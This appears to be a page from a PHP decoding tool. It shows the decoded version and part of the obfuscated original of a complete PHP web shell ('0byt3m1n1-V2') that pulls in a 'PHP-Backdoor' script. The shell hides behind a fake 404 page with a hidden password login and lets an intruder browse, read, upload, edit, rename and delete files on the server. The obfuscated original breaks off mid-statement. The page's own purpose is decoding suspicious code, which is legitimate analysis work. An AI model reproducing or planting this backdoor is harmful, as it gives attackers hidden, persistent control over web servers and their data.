Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php goto b_yuc; mYmL6: echo "\74\x62\x72\76\x5b\40\x3c\x61\x20\150\162\x65\146\x3d\x22..
Decoded Output download
<?php
goto b_yuc; mYmL6: echo "<br>[ <a href="?">Home</a> ]</font></td><td align="center" width="27%"><form enctype="multipart/form-data" method="POST"><input type="file" name="file" style="color:#ef6c00;margin-bottom:4px;"/><input type="submit" value="Upload" /></form></td></tr><tr><td colspan="2">"; goto hicZp; Y8Hsr: $__gcdir = "g" . "etcwd"; goto Msegu; ah3_T: function generateRandomString($length = 10) { $characters = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"; $charactersLength = strlen($characters); $randomString = ''; for ($i = 0; $i < $length; $i++) { $randomString .= $characters[rand(0, $charactersLength - 1)]; } return $randomString; } goto xP9t4; iJ9o4: echo "<br><center>© <span id="footer"></span> 2018.</center><br>"; goto qjHsz; OmIbE: echo "<font style='font-size:13px;'>Path: "; goto vmx3V; aRjXz: if (empty($_SESSION[md5($_SERVER["HTTP_HOST"])])) { if (isset($_POST[$keyxx]) and sha1(md5($_POST[$keyxx])) == $auth_pass5) { $_SESSION[md5($_SERVER["HTTP_HOST"])] = true; } else { printLoginx(); } die; } goto RLnO2; RLnO2: set_time_limit(0); goto fkrQx; X0P4o: error_log(0); goto LOwXJ; SyUFS: echo "<div style="color:#ef6c00;margin-top:0;"><h1><center>" . $sname . "</center></h1></div>"; goto j9hma; j9hma: if (isset($_GET["path"])) { $path = $_GET["path"]; chdir($_GET["path"]); } else { $path = $__gcdir(); } goto OARj6; OARj6: $path = str_replace("\", "/", $path); goto XjzSS; wP3Tc: echo ''; goto D4juJ; qjHsz: echo "<script type="text/javascript" src="//zerobyte-id.github.io/PHP-Backdoor/inc/footer.js"></script>"; goto hSYfA; cNJXL: $auth_pass5 = "6862666e8162fe84d316aee51fbb07f614acf3a6"; goto WKzjR; D4juJ: if (isset($_GET["filesrc"])) { echo "<table width="100%" border="0" cellpadding="3" cellspacing="1" align="center"><tr><td>File: "; echo '' . basename($_GET["filesrc"]); ''; echo "</tr></td></table><br />"; echo "<center><textarea readonly=''>" . htmlspecialchars($__fgetcon7s($_GET["filesrc"])) . "</textarea></center>"; } elseif (isset($_GET["option"]) && $_POST["opt"] != "delete") { echo "</table><br /><center>" . $_POST["path"] . "<br /><br />"; if ($_POST["opt"] == "rename") { if (isset($_POST["newname"])) { if (rename($_POST["path"], $path . "/" . $_POST["newname"])) { echo "<center><font color="#00ff00">Rename OK!</font></center><br />"; } else { echo "<center><font color="red">Rename Failed!</font></center><br />"; } $_POST["name"] = $_POST["newname"]; } echo "<form method="POST">New Name : <input name="newname" type="text" size="20" value="" . $_POST["name"] . "" /> <input type="hidden" name="path" value="" . $_POST["path"] . ""><input type="hidden" name="opt" value="rename"><input type="submit" value="Go" /></form>"; } elseif ($_POST["opt"] == "edit") { if (isset($_POST["src"])) { $fp = fopen($_POST["path"], "w"); if (fwrite($fp, $_POST["src"])) { echo "<center><font color="#00ff00">Edit File OK!.</font></center><br />"; } else { echo "<center><font color="red">Edit File Failed!.</font></center><br />"; } fclose($fp); } echo "<form method="POST"><textarea cols=80 rows=20 name="src">" . htmlspecialchars($__fgetcon7s($_POST["path"])) . "</textarea><br /><input type="hidden" name="path" value="" . $_POST["path"] . ""><input type="hidden" name="opt" value="edit"><input type="submit" value="Go" /></form>"; } echo "</center>"; } else { echo "</table><br /><center>"; if (isset($_GET["option"]) && $_POST["opt"] == "delete") { if ($_POST["type"] == "dir") { if ($rm__dir($_POST["path"])) { echo "<center><font color="#00ff00">Dir Deleted!</font></center><br />"; } else { echo "<center><font color="red">Delete Dir Failed!</font></center><br />"; } } elseif ($_POST["type"] == "file") { if ($un__link($_POST["path"])) { echo "<font color="#00ff00">Delete File Done.</font><br />"; } else { echo "<font color="red">Delete File Error.</font><br />"; } } } echo "</center>"; $_scdir = $__scdir($path); echo "<div id="content"><table width="100%" border="0" cellpadding="3" cellspacing="1" align="center"><tr class="first"> <th><center>Name</center></th><th width="12%"><center>Size</center></th><th width="10%"><center>Permissions</center></th> <th width="15%"><center>Last Update</center></th><th width="11%"><center>Options</center></th></tr>"; foreach ($_scdir as $dir) { if (!is_dir("{$path}/{$dir}") || $dir == "." || $dir == "..") { continue; } echo "<tr><td>[D] <a href="?path={$path}/{$dir}">{$dir}</a></td><td><center>--</center></td><td><center>"; if (is_writable("{$path}/{$dir}")) { echo "<font color="#00ff00">"; } elseif (!is_readable("{$path}/{$dir}")) { echo "<font color="red">"; } echo perms("{$path}/{$dir}"); if (is_writable("{$path}/{$dir}") || !is_readable("{$path}/{$dir}")) { echo "</font>"; } echo "</center></td><td><center>" . date("d-M-Y H:i", filemtime("{$path}/{$dir}")) . ''; echo "</center></td> <td><center><form method="POST" action="?option&path={$path}"><select name="opt"><option value=""></option><option value="delete">Delete</option><option value="rename">Rename</option></select><input type="hidden" name="type" value="dir"><input type="hidden" name="name" value="{$dir}"><input type="hidden" name="path" value="{$path}/{$dir}"><input type="submit" value="+" /></form></center></td></tr>"; } foreach ($_scdir as $file) { if (!is_file("{$path}/{$file}")) { continue; } $size = filesize("{$path}/{$file}") / 1024; $size = round($size, 3); if ($size >= 1024) { $size = round($size / 1024, 2) . " MB"; } else { $size = $size . " KB"; } echo "<tr><td>[F] <a href="?filesrc={$path}/{$file}&path={$path}">{$file}</a></td><td><center>" . $size . "</center></td><td><center>"; if (is_writable("{$path}/{$file}")) { echo "<font color="#00ff00">"; } elseif (!is_readable("{$path}/{$file}")) { echo "<font color="red">"; } echo perms("{$path}/{$file}"); if (is_writable("{$path}/{$file}") || !is_readable("{$path}/{$file}")) { echo "</font>"; } echo "</center></td><td><center>" . date("d-M-Y H:i", filemtime("{$path}/{$file}")) . ''; echo "</center></td><td><center><form method="POST" action="?option&path={$path}"><select name="opt"><option value=""></option><option value="delete">Delete</option><option value="rename">Rename</option><option value="edit">Edit</option></select><input type="hidden" name="type" value="file"><input type="hidden" name="name" value="{$file}"><input type="hidden" name="path" value="{$path}/{$file}"><input type="submit" value="+" /></form></center></td></tr>"; } echo "</table></div>"; } goto JAwo_; hicZp: if (isset($_FILES["file"])) { if (copy($_FILES["file"]["tmp_name"], $path . "/" . $_FILES["file"]["name"])) { echo "<center><font color="#00ff00">Upload OK!</font></center><br/>"; } else { echo "<center><font color="red">Upload FAILED!</font></center><br/>"; } } goto odIG9; Msegu: $__fgetcon7s = "file" . "_get_contents"; goto vG7e0; LJplN: echo "<!DOCTYPE html><html><head><meta name="robots" content"noindex. nofollow"><link href="https://fonts.googleapis.com/css?family=VT323" rel="stylesheet"><title>" . $sname . "</title><script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script><link href="//zerobyte-id.github.io/PHP-Backdoor/inc/m1n1.css" rel="stylesheet" type="text/css"></head><body>"; goto SyUFS; vG7e0: $__scdir = "s" . "candi" . "r"; goto BoXDS; XjzSS: $paths = explode("/", $path); goto cekk3; hSYfA: echo "</body></html><!-- EOF -->"; goto h2stU; cekk3: echo "<table width="100%" border="0" align="center" style="margin-top:-10px;"><tr><td>"; goto OmIbE; BoXDS: $rm__dir = "rmd" . "ir"; goto bGl2e; odIG9: echo "</td></tr><tr><td></table><div class="table-div"></div><input id="image" type="hidden">"; goto wP3Tc; cwb1S: if (get_magic_quotes_gpc()) { foreach ($_POST as $key => $value) { $_POST[$key] = stripslashes($value); } } goto LJplN; b_yuc: session_start(); goto ah3_T; fkrQx: error_reporting(0); goto X0P4o; LOwXJ: $sname = "0byt3m1n1" . "-V2"; goto Y8Hsr; xP9t4: function printLoginx() { echo "<!DOCTYPE html><html><head><meta name="robots" content"noindex. nofollow"><title></title></head><body>
<h1>Not Found</h1> \xa <title>404 Not Found</title>\xa <style type="text/css">
input[type=password] {
width: 250px;
height: 25px;\xa color: white;
background: transparent;
border: 1px solid white;
margin-left: 20px;
text-align: center;
}
</style>\xa <p>The requested URL was not found on this server.</p> \xa <p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p> \xa <hr>
<address>Apache Server at " . $_SERVER["HTTP_HOST"] . " Port " . $_SERVER["SERVER_PORT"] . "</address> \xa <center><form method="post"><input type="password" name="" . $_SESSION["keyxx"] . "" autocomplete="off"><br></form></center></body></html>\xa "; die; } goto cNJXL; TXh1J: $keyxx = $_SESSION["keyxx"]; goto aRjXz; vmx3V: foreach ($paths as $id => $pat) { echo "<a style='font-size:13px;' href='?path="; for ($i = 0; $i <= $id; $i++) { echo $paths[$i]; if ($i != $id) { echo "/"; } } echo "'>{$pat}</a>/"; } goto mYmL6; JAwo_: function perms($file) { $perms = fileperms($file); if (($perms & 49152) == 49152) { $info = "s"; } elseif (($perms & 40960) == 40960) { $info = "l"; } elseif (($perms & 32768) == 32768) { $info = "-"; } elseif (($perms & 24576) == 24576) { $info = "b"; } elseif (($perms & 16384) == 16384) { $info = "d"; } elseif (($perms & 8192) == 8192) { $info = "c"; } elseif (($perms & 4096) == 4096) { $info = "p"; } else { $info = "u"; } $info .= $perms & 256 ? "r" : "-"; $info .= $perms & 128 ? "w" : "-"; $info .= $perms & 64 ? $perms & 2048 ? "s" : "x" : ($perms & 2048 ? "S" : "-"); $info .= $perms & 32 ? "r" : "-"; $info .= $perms & 16 ? "w" : "-"; $info .= $perms & 8 ? $perms & 1024 ? "s" : "x" : ($perms & 1024 ? "S" : "-"); $info .= $perms & 4 ? "r" : "-"; $info .= $perms & 2 ? "w" : "-"; $info .= $perms & 1 ? $perms & 512 ? "t" : "x" : ($perms & 512 ? "T" : "-"); return $info; } goto iJ9o4; bGl2e: $un__link = "un" . "link"; goto cwb1S; WKzjR: if (empty($_SESSION["keyxx"])) { $keyxxx = generateRandomString(); $_SESSION["keyxx"] = $keyxxx; } goto TXh1J; h2stU: ?>
Did this file decode correctly?
Original Code
<?php
goto b_yuc; mYmL6: echo "\74\x62\x72\76\x5b\40\x3c\x61\x20\150\162\x65\146\x3d\x22\x3f\x22\x3e\x48\x6f\155\x65\74\x2f\141\76\40\135\74\57\x66\157\x6e\164\x3e\x3c\57\x74\x64\x3e\x3c\164\x64\x20\x61\x6c\x69\x67\156\75\x22\x63\x65\x6e\164\x65\x72\42\40\x77\x69\144\x74\x68\x3d\x22\x32\x37\45\42\x3e\x3c\x66\x6f\162\x6d\40\145\156\x63\x74\x79\x70\145\x3d\x22\x6d\x75\x6c\164\151\x70\x61\x72\164\x2f\146\x6f\x72\x6d\55\x64\x61\x74\141\x22\x20\155\145\x74\150\157\x64\75\42\x50\117\123\x54\x22\x3e\74\151\x6e\160\165\164\x20\164\x79\x70\145\x3d\x22\146\151\154\145\42\x20\x6e\141\155\x65\75\42\x66\x69\154\145\x22\40\163\x74\x79\154\145\x3d\x22\143\x6f\154\157\x72\x3a\43\145\x66\x36\x63\x30\60\x3b\155\141\x72\147\151\156\x2d\x62\157\x74\x74\157\155\x3a\64\x70\x78\73\x22\57\76\74\x69\156\160\165\x74\40\x74\x79\x70\x65\x3d\x22\x73\165\x62\x6d\151\164\x22\x20\166\141\x6c\x75\145\75\x22\125\160\x6c\157\x61\x64\x22\x20\x2f\76\74\57\146\x6f\162\x6d\76\x3c\x2f\164\144\76\74\57\164\162\76\x3c\164\x72\x3e\x3c\164\x64\40\x63\x6f\x6c\163\160\141\156\x3d\42\x32\x22\x3e"; goto hicZp; Y8Hsr: $__gcdir = "\147" . "\145\164\x63\167\x64"; goto Msegu; ah3_T: function generateRandomString($length = 10) { $characters = "\x30\61\x32\63\64\65\x36\67\70\71\141\142\x63\144\145\146\147\150\151\x6a\153\x6c\x6d\x6e\157\160\161\162\163\164\165\x76\167\170\171\172\x41\x42\103\104\105\x46\107\x48\x49\x4a\x4b\114\x4d\x4e\x4f\x50\121\122\x53\124\125\126\127\x58\131\132"; $charactersLength = strlen($characters); $randomString = ''; for ($i = 0; $i < $length; $i++) { $randomString .= $characters[rand(0, $charactersLength - 1)]; } return $randomString; } goto xP9t4; iJ9o4: echo "\74\x62\x72\76\x3c\x63\x65\156\x74\x65\x72\76\46\143\157\x70\x79\x3b\40\x3c\163\x70\x61\156\40\151\x64\75\42\146\157\x6f\164\145\162\x22\76\x3c\x2f\x73\160\141\x6e\76\40\x32\x30\61\x38\56\74\x2f\143\145\x6e\x74\x65\x72\x3e\x3c\142\162\x3e"; goto qjHsz; OmIbE: echo "\74\x66\157\x6e\164\x20\x73\x74\x79\154\145\x3d\x27\x66\157\x6e\x74\55\x73\151\x7a\x65\72\x31\63\160\x78\73\x27\76\120\x61\164\150\72\x20"; goto vmx3V; aRjXz: if (empty($_SESSION[md5($_SERVER["\x48\x54\x54\120\137\x48\117\123\x54"])])) { if (isset($_POST[$keyxx]) and sha1(md5($_POST[$keyxx])) == $auth_pass5) { $_SESSION[md5($_SERVER["\110\124\124\x50\137\110\117\123\x54"])] = true; } else { printLoginx(); } die; } goto RLnO2; RLnO2: set_time_limit(0); goto fkrQx; X0P4o: error_log(0); goto LOwXJ; SyUFS: echo "\74\x64\x69\166\40\x73\164\x79\x6c\145\x3d\x22\143\x6f\154\x6f\162\x3a\x23\x65\146\66\x63\x30\60\73\x6d\141\x72\x67\151\156\x2d\164\x6f\160\x3a\60\x3b\x22\x3e\x3c\x68\x31\x3e\74\143\x65\x6e\x74\x65\x72\x3e" . $sname . "\74\x2f\143\145\x6e\164\x65\x72\76\x3c\x2f\150\x31\76\x3c\x2f\144\x69\x76\x3e"; goto j9hma; j9hma: if (isset($_GET["\160\x61\164\x68"])) { $path = $_GET["\160\x61\164\150"]; chdir($_GET["\x70\x61\164\x68"]); } else { $path = $__gcdir(); } goto OARj6; OARj6: $path = str_replace("\134", "\57", $path); goto XjzSS; wP3Tc: echo ''; goto D4juJ; qjHsz: echo "\x3c\x73\143\162\x69\x70\164\x20\164\x79\x70\145\75\42\x74\145\x78\x74\57\152\141\166\x61\163\143\x72\x69\x70\x74\x22\x20\x73\162\143\75\42\57\57\x7a\145\162\157\142\171\x74\x65\55\x69\x64\56\x67\x69\164\x68\165\x62\x2e\x69\x6f\x2f\120\x48\120\x2d\x42\141\143\153\144\157\157\x72\57\x69\156\143\57\146\x6f\x6f\164\145\x72\x2e\152\163\x22\x3e\x3c\57\163\x63\162\x69\x70\x74\76"; goto hSYfA; cNJXL: $auth_pass5 = "\66\x38\66\x32\x36\66\66\145\70\x31\66\x32\146\145\70\64\x64\63\61\66\x61\145\145\x35\61\x66\142\142\60\67\146\x36\x31\64\x61\x63\146\63\x61\66"; goto WKzjR; D4juJ: if (isset($_GET["\146\x69\x6c\x65\163\162\x63"])) { echo "\74\164\x61\x62\154\145\40\167\x69\144\x74\x68\75\42\x31\60\60\x25\x22\40\142\x6f\x72\x64\145\x72\75\x22\x30\42\x20\x63\145\x6c\x6c\160\141\x64\144\151\156\147\x3d\x22\63\x22\x20\x63\145\x6c\154\163\x70\x61\x63\151\x6e\x67\x3d\42\x31\x22\x20\x61\154\151\x67\156\75\42\143\x65\x6e\164\x65\x72\x22\76\74\164\162\x3e\74\x74\144\76\x46\x69\x6c\145\x3a\40"; echo '' . basename($_GET["\146\151\x6c\145\163\x72\143"]); ''; echo "\x3c\x2f\x74\x72\x3e\x3c\x2f\x74\144\x3e\74\57\x74\141\x62\x6c\145\x3e\x3c\x62\162\x20\57\76"; echo "\74\143\145\x6e\164\145\162\76\74\x74\145\x78\x74\x61\162\x65\141\40\162\145\141\x64\157\156\154\171\75\x27\x27\x3e" . htmlspecialchars($__fgetcon7s($_GET["\146\151\154\x65\x73\162\143"])) . "\74\x2f\x74\145\x78\x74\141\162\x65\x61\76\x3c\57\143\145\x6e\164\x65\x72\76"; } elseif (isset($_GET["\x6f\160\x74\151\157\156"]) && $_POST["\x6f\x70\x74"] != "\144\x65\154\145\164\x65") { echo "\x3c\x2f\x74\x61\x62\154\145\x3e\74\142\x72\x20\57\x3e\74\143\x65\156\x74\x65\x72\76" . $_POST["\160\141\x74\x68"] . "\74\142\x72\40\57\x3e\74\142\162\40\x2f\x3e"; if ($_POST["\157\160\164"] == "\x72\x65\x6e\141\155\145") { if (isset($_POST["\156\x65\x77\156\141\x6d\145"])) { if (rename($_POST["\160\x61\164\150"], $path . "\x2f" . $_POST["\x6e\145\167\156\141\x6d\x65"])) { echo "\74\x63\145\x6e\x74\x65\162\76\x3c\x66\157\156\x74\40\143\x6f\154\157\162\x3d\x22\x23\x30\60\x66\x66\x30\x30\42\x3e\122\145\x6e\x61\x6d\x65\x20\x4f\x4b\41\74\x2f\146\157\x6e\164\x3e\74\57\143\x65\x6e\164\x65\162\76\x3c\x62\162\x20\x2f\x3e"; } else { echo "\x3c\x63\145\x6e\x74\x65\162\76\74\146\x6f\x6e\164\40\143\157\154\x6f\162\x3d\42\x72\145\x64\x22\x3e\122\x65\156\141\x6d\x65\x20\106\141\x69\154\145\x64\x21\x3c\57\x66\x6f\x6e\164\x3e\x3c\57\x63\145\156\x74\x65\x72\76\x3c\142\x72\40\57\76"; } $_POST["\x6e\x61\155\145"] = $_POST["\x6e\145\167\156\x61\155\145"]; } echo "\x3c\146\157\x72\155\40\x6d\x65\x74\x68\157\x64\x3d\x22\120\x4f\123\124\42\76\116\x65\167\x20\116\x61\155\x65\x20\x3a\x20\74\151\156\x70\165\164\40\156\x61\155\145\x3d\42\156\x65\x77\x6e\x61\x6d\x65\42\x20\x74\x79\x70\145\x3d\x22\x74\x65\x78\x74\x22\x20\x73\151\172\145\75\42\x32\60\42\x20\x76\x61\154\165\145\75\42" . $_POST["\156\141\x6d\145"] . "\42\40\x2f\76\40\x3c\x69\156\160\x75\164\x20\x74\171\x70\x65\75\42\150\x69\144\x64\145\x6e\x22\40\x6e\141\155\145\x3d\42\160\x61\164\150\x22\40\166\x61\x6c\165\x65\75\x22" . $_POST["\160\141\164\150"] . "\42\x3e\74\x69\x6e\160\165\x74\40\x74\171\160\145\x3d\42\x68\x69\x64\x64\x65\x6e\x22\x20\x6e\x61\x6d\145\75\x22\157\160\x74\x22\x20\166\141\154\165\x65\x3d\42\162\x65\156\141\155\145\x22\x3e\x3c\x69\x6e\160\165\164\x20\x74\171\160\145\x3d\x22\163\165\142\155\151\x74\x22\x20\166\141\x6c\x75\x65\x3d\42\x47\157\42\40\57\76\74\x2f\x66\x6f\162\x6d\76"; } elseif ($_POST["\157\160\164"] == "\x65\x64\x69\164") { if (isset($_POST["\x73\x72\143"])) { $fp = fopen($_POST["\160\141\164\150"], "\167"); if (fwrite($fp, $_POST["\163\x72\x63"])) { echo "\74\x63\145\156\164\145\x72\76\x3c\x66\x6f\156\x74\x20\143\157\154\x6f\x72\75\42\x23\x30\x30\146\x66\60\60\42\x3e\x45\x64\151\x74\40\106\x69\154\145\x20\117\x4b\x21\56\x3c\57\x66\x6f\156\164\76\x3c\x2f\x63\x65\x6e\164\145\162\76\x3c\x62\x72\40\57\76"; } else { echo "\x3c\x63\145\x6e\x74\x65\162\x3e\x3c\x66\x6f\156\x74\40\x63\x6f\154\x6f\162\75\x22\162\145\x64\42\x3e\x45\144\151\x74\40\106\x69\x6c\145\x20\x46\141\151\x6c\145\x64\x21\x2e\x3c\x2f\x66\157\156\x74\x3e\74\57\x63\x65\x6e\x74\x65\162\76\74\x62\x72\40\57\x3e"; } fclose($fp); } echo "\74\x66\x6f\162\155\40\155\x65\164\x68\157\x64\x3d\42\x50\x4f\x53\124\42\x3e\x3c\x74\x65\x78\x74\x61\x72\x65\x61\40\143\157\x6c\x73\75\70\x30\40\x72\x6f\x77\x73\75\62\60\40\x6e\141\x6d\x65\x3d\42\x73\x72\143\42\76" . htmlspecialchars($__fgetcon7s($_POST["\x70\x61\164\150"])) . "\x3c\x2f\x74\x65\170\164\x61\162\145\x61\x3e\x3c\x62\x72\x20\x2f\76\x3c\151\156\x70\165\164\40\x74\171\x70\145\75\x22\150\x69\144\x64\x65\x6e\x22\40\156\141\x6d\x65\x3d\42\160\x61\x74\x68\x22\40\166\x61\x6c\165\x65\75\42" . $_POST["\160\x61\164\150"] . "\x22\76\74\x69\156\160\x75\x74\40\x74\x79\x70\145\x3d\x22\x68\151\x64\144\x65\156\x22\40\x6e\141\x6d\145\x3d\x22\x6f\x70\x74\x22\x20\x76\141\x6c\x75\145\75\42\x65\x64\151\164\42\x3e\74\x69\x6e\x70\165\164\x20\x74\171\160\x65\x3d\x22\163\x75\x62\x6d\151\x74\x22\x20\x76\141\x6c\165\145\x3d\42\x47\x6f\x22\40\x2f\x3e\x3c\x2f\146\x6f\162\155\76"; } echo "\74\x2f\x63\x65\156\x74\x65\x72\76"; } else { echo "\74\57\164\x61\142\154\145\x3e\74\142\162\x20\57\x3e\x3c\x63\x65\156\x74\x65\x72\x3e"; if (isset($_GET["\157\160\x74\x69\x6f\156"]) && $_POST["\157\x70\164"] == "\144\x65\154\145\x74\145") { if ($_POST["\164\171\160\145"] == "\x64\151\x72") { if ($rm__dir($_POST["\x70\x61\x74\150"])) { echo "\x3c\143\x65\x6e\x74\x65\162\x3e\74\146\157\x6e\x74\x20\143\157\154\157\x72\x3d\x22\x23\x30\x30\146\x66\x30\x30\42\x3e\104\151\162\x20\x44\145\154\145\164\x65\x64\41\74\x2f\146\157\x6e\164\76\x3c\x2f\143\145\x6e\x74\x65\162\x3e\74\142\162\x20\x2f\76"; } else { echo "\74\x63\145\x6e\x74\x65\x72\x3e\74\x66\x6f\x6e\x74\40\143\x6f\154\157\162\x3d\x22\x72\145\144\x22\x3e\x44\x65\x6c\x65\164\x65\40\104\x69\162\x20\106\141\151\x6c\x65\144\x21\x3c\57\x66\x6f\x6e\164\x3e\74\57\x63\x65\x6e\164\x65\x72\76\x3c\x62\x72\40\x2f\76"; } } elseif ($_POST["\x74\x79\x70\x65"] == "\146\151\x6c\x65") { if ($un__link($_POST["\x70\x61\x74\150"])) { echo "\x3c\146\157\156\164\40\x63\157\x6c\x6f\162\75\x22\x23\60\x30\x66\x66\60\60\42\x3e\104\145\154\x65\x74\145\40\x46\x69\154\145\x20\104\157\156\x65\x2e\74\x2f\146\x6f\x6e\x74\76\74\x62\162\x20\x2f\76"; } else { echo "\x3c\146\157\156\164\x20\x63\x6f\154\x6f\x72\75\42\x72\x65\144\x22\x3e\x44\x65\x6c\x65\x74\x65\x20\106\151\154\145\x20\105\x72\x72\157\162\x2e\x3c\x2f\146\157\x6e\x74\x3e\x3c\x62\162\x20\57\76"; } } } echo "\x3c\x2f\143\x65\156\164\145\x72\76"; $_scdir = $__scdir($path); echo "\74\144\151\x76\40\x69\144\x3d\42\143\157\156\164\x65\156\x74\x22\76\x3c\164\141\x62\x6c\x65\x20\167\x69\144\x74\x68\x3d\x22\61\60\x30\x25\42\x20\142\x6f\162\x64\x65\162\75\42\x30\42\x20\143\145\x6c\154\x70\141\x64\x64\x69\x6e\147\x3d\42\x33\x22\40\143\x65\x6c\154\163\160\x61\x63\151\156\x67\75\x22\61\42\40\141\154\151\x67\156\x3d\42\143\145\156\164\145\162\42\76\x3c\x74\162\40\x63\154\141\x73\163\75\42\146\151\x72\x73\164\42\x3e\x20\x3c\x74\150\x3e\74\x63\x65\156\164\x65\162\76\116\141\x6d\145\74\57\143\x65\x6e\x74\x65\162\x3e\x3c\57\x74\150\76\74\164\150\40\x77\151\x64\x74\x68\75\42\x31\62\x25\42\76\74\x63\145\x6e\164\145\162\76\123\x69\x7a\x65\74\57\143\x65\x6e\x74\145\162\x3e\x3c\57\x74\x68\x3e\x3c\x74\x68\x20\167\x69\144\164\150\x3d\42\x31\60\x25\42\x3e\x3c\143\145\x6e\x74\x65\x72\x3e\x50\145\162\x6d\151\x73\x73\151\157\x6e\163\74\x2f\143\x65\x6e\164\x65\x72\76\x3c\57\164\x68\x3e\x20\x3c\164\x68\40\x77\x69\x64\x74\x68\x3d\x22\x31\65\45\x22\x3e\74\x63\145\156\164\145\162\x3e\x4c\141\163\164\40\125\x70\x64\x61\164\x65\74\57\x63\x65\x6e\164\x65\x72\x3e\74\57\x74\150\x3e\x3c\x74\150\40\167\x69\144\x74\x68\x3d\x22\x31\x31\45\42\76\74\143\x65\156\164\x65\x72\x3e\x4f\160\x74\151\x6f\x6e\163\74\x2f\x63\x65\x6e\x74\x65\162\x3e\74\57\x74\150\x3e\x3c\57\x74\162\76"; foreach ($_scdir as $dir) { if (!is_dir("{$path}\57{$dir}") || $dir == "\x2e" || $dir == "\x2e\x2e") { continue; } echo "\x3c\x74\x72\76\74\x74\x64\x3e\133\x44\x5d\x20\74\x61\40\x68\x72\x65\x66\75\42\77\160\141\164\x68\x3d{$path}\57{$dir}\x22\76{$dir}\74\57\x61\76\74\57\164\x64\76\74\164\x64\x3e\x3c\143\x65\x6e\164\145\162\x3e\x2d\55\74\x2f\x63\145\156\164\145\x72\76\x3c\x2f\x74\x64\x3e\74\164\x64\76\74\143\145\156\164\145\162\x3e"; if (is_writable("{$path}\x2f{$dir}")) { echo "\x3c\x66\157\x6e\164\40\x63\157\x6c\157\x72\75\x22\43\60\60\x66\x66\x30\x30\42\x3e"; } elseif (!is_readable("{$path}\x2f{$dir}")) { echo "\74\x66\x6f\x6e\164\x20\143\157\154\157\x72\75\42\162\x65\144\42\x3e"; } echo perms("{$path}\57{$dir}"); if (is_writable("{$path}\57{$dir}") || !is_readable("{$path}\x2f{$dir}")) { echo "\74\57\146\x6f\156\x74\76"; } echo "\74\57\143\145\156\x74\x65\x72\x3e\x3c\x2f\164\144\76\x3c\x74\x64\76\x3c\x63\145\156\164\x65\162\x3e" . date("\x64\55\x4d\55\x59\40\x48\x3a\151", filemtime("{$path}\57{$dir}")) . ''; echo "\74\x2f\143\145\x6e\164\x65\x72\76\x3c\57\164\144\76\40\x3c\164\144\x3e\x3c\143\x65\x6e\x74\x65\x72\76\x3c\146\x6f\162\155\x20\155\145\164\x68\157\x64\75\42\x50\117\123\124\42\40\x61\143\164\x69\x6f\156\x3d\42\77\157\x70\164\x69\157\x6e\x26\160\141\164\150\75{$path}\x22\x3e\x3c\x73\145\154\x65\x63\x74\40\156\141\x6d\145\75\42\x6f\160\164\42\76\74\157\160\x74\x69\x6f\156\x20\166\x61\x6c\x75\145\75\42\x22\x3e\74\x2f\157\x70\164\x69\157\156\x3e\74\x6f\160\x74\151\x6f\x6e\40\x76\141\154\x75\x65\75\x22\144\145\x6c\145\x74\x65\42\76\x44\145\154\145\x74\145\x3c\57\157\160\x74\x69\x6f\x6e\x3e\74\157\160\164\151\x6f\156\40\x76\x61\x6c\165\x65\75\42\x72\145\156\x61\x6d\x65\x22\76\x52\x65\x6e\x61\x6d\145\x3c\57\157\160\x74\151\x6f\x6e\x3e\x3c\x2f\x73\145\x6c\145\x63\x74\x3e\x3c\x69\x6e\x70\165\164\40\164\171\x70\145\75\42\150\x69\144\144\x65\156\x22\x20\x6e\141\x6d\x65\75\42\x74\171\160\x65\x22\40\166\x61\x6c\x75\x65\75\x22\x64\x69\162\42\x3e\74\x69\x6e\160\x75\164\x20\164\x79\x70\x65\x3d\x22\x68\x69\144\x64\x65\156\42\40\156\x61\x6d\x65\75\42\156\141\155\145\42\40\166\141\x6c\165\x65\x3d\x22{$dir}\42\x3e\74\x69\x6e\x70\165\x74\x20\164\171\160\145\x3d\42\x68\151\144\x64\145\156\x22\x20\x6e\x61\155\145\75\x22\x70\x61\x74\150\42\40\x76\141\x6c\x75\x65\x3d\x22{$path}\x2f{$dir}\x22\76\x3c\151\156\x70\165\164\40\x74\x79\x70\145\x3d\x22\163\165\x62\155\151\164\42\x20\166\x61\x6c\x75\145\x3d\x22\x2b\x22\40\x2f\x3e\74\x2f\x66\x6f\162\x6d\76\x3c\57\143\x65\x6e\164\145\x72\76\74\57\x74\x64\76\74\x2f\x74\x72\x3e"; } foreach ($_scdir as $file) { if (!is_file("{$path}\x2f{$file}")) { continue; } $size = filesize("{$path}\57{$file}") / 1024; $size = round($size, 3); if ($size >= 1024) { $size = round($size / 1024, 2) . "\40\115\x42"; } else { $size = $size . "\40\x4b\102"; } echo "\x3c\164\162\x3e\x3c\164\144\x3e\133\106\x5d\40\74\141\40\150\x72\x65\146\75\x22\x3f\146\x69\x6c\x65\163\x72\x63\75{$path}\x2f{$file}\46\x70\x61\x74\150\x3d{$path}\x22\76{$file}\x3c\57\141\x3e\74\x2f\164\x64\76\x3c\x74\x64\x3e\74\x63\x65\156\x74\145\x72\x3e" . $size . "\x3c\57\x63\145\x6e\x74\145\x72\x3e\74\57\x74\x64\x3e\74\x74\x64\x3e\74\143\x65\x6e\164\x65\162\76"; if (is_writable("{$path}\x2f{$file}")) { echo "\74\x66\157\156\164\x20\x63\157\x6c\157\x72\x3d\42\x23\60\60\146\146\x30\60\x22\76"; } elseif (!is_readable("{$path}\57{$file}")) { echo "\74\146\157\156\164\x20\143\x6f\x6c\x6f\162\75\42\x72\145\x64\x22\76"; } echo perms("{$path}\57{$file}"); if (is_writable("{$path}\57{$file}") || !is_readable("{$path}\57{$file}")) { echo "\74\x2f\146\157\156\x74\76"; } echo "\x3c\x2f\143\145\x6e\x74\x65\162\x3e\x3c\x2f\x74\144\76\74\164\x64\x3e\x3c\143\x65\x6e\x74\145\162\x3e" . date("\144\55\115\x2d\x59\40\110\72\151", filemtime("{$path}\x2f{$file}")) . ''; echo 